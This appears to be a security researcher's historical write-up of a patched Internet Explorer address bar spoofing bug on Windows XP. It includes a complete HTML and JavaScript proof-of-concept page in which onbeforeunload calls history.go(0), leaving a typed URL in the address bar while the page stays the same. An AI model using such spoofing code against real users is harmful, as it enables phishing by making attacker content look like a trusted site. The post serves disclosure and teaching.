I was looking at address bar spoofing scenarios and found that combining window.onbeforeunload with history.go(0) produced a clean URL spoof on Windows XP. When a user typed a new URL and pressed Enter, the onbeforeunload handler would fire and call history.go(0), which aborted the navigation while leaving the newly typed URL visible in the address bar. The page itself never changed. A similar technique had been published before (lcamtuf’s ietrap), but this one used a slightly different mechanism without document.open. It did not work on Windows Vista.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>urlSpoofOnBeforeUnload</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>urlSpoofOnBeforeUnload</h2>
</center>
<div id="mainText">
While trying to navigate to a different URL, we will abort the navigation but keep the typed URL in the addressBar.<br />
This is similar to this one [http://lcamtuf.coredump.cx/ietrap/] but it works only on<b>before</b>unload and it does not
use document.open. Just a history.go(0)<br /><br />
In other words, we achieve the same thing as [http://lcamtuf.coredump.cx/ietrap/] but using a different technique.<br /><br />
<font color="blue">
<b>Go ahead! Type any URL in the addressBar, and let's see what happens...</b><br /><br />
</font>
This version <b>does not work</b> on Windows Vista.
</div>
<hr />
<script language="JavaScript">
// Fires when the user types a new URL and presses Enter. Reloading the
// current page from here aborts the outgoing navigation on IE/XP, but the
// address bar keeps showing the URL that was typed.
window.onbeforeunload = function()
{
history.go(0);
}
// window.opener is abused as a flag that survives the reload, so the page
// can show a different text the second time around.
if (!window.opener)
{
window.opener = 1;
}
else
{
document.all.mainText.innerHTML = 'The URL on the addressBar has changed, however, we are still on the same page.';
}
</script>
</font>
</body>
</html>
When onbeforeunload fires during an address bar navigation, calling history.go(0) causes IE to restart the current page load, which effectively cancels the outgoing navigation. However, the address bar does not revert to the original URL: it retains whatever the user had typed. A visitor to a malicious page could therefore be shown a spoofed URL (say, a bank's login page address) in the address bar while actually remaining on attacker-controlled content. The Vista fix (protected mode / process isolation changes) broke this particular path; the follow-up post addresses that.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.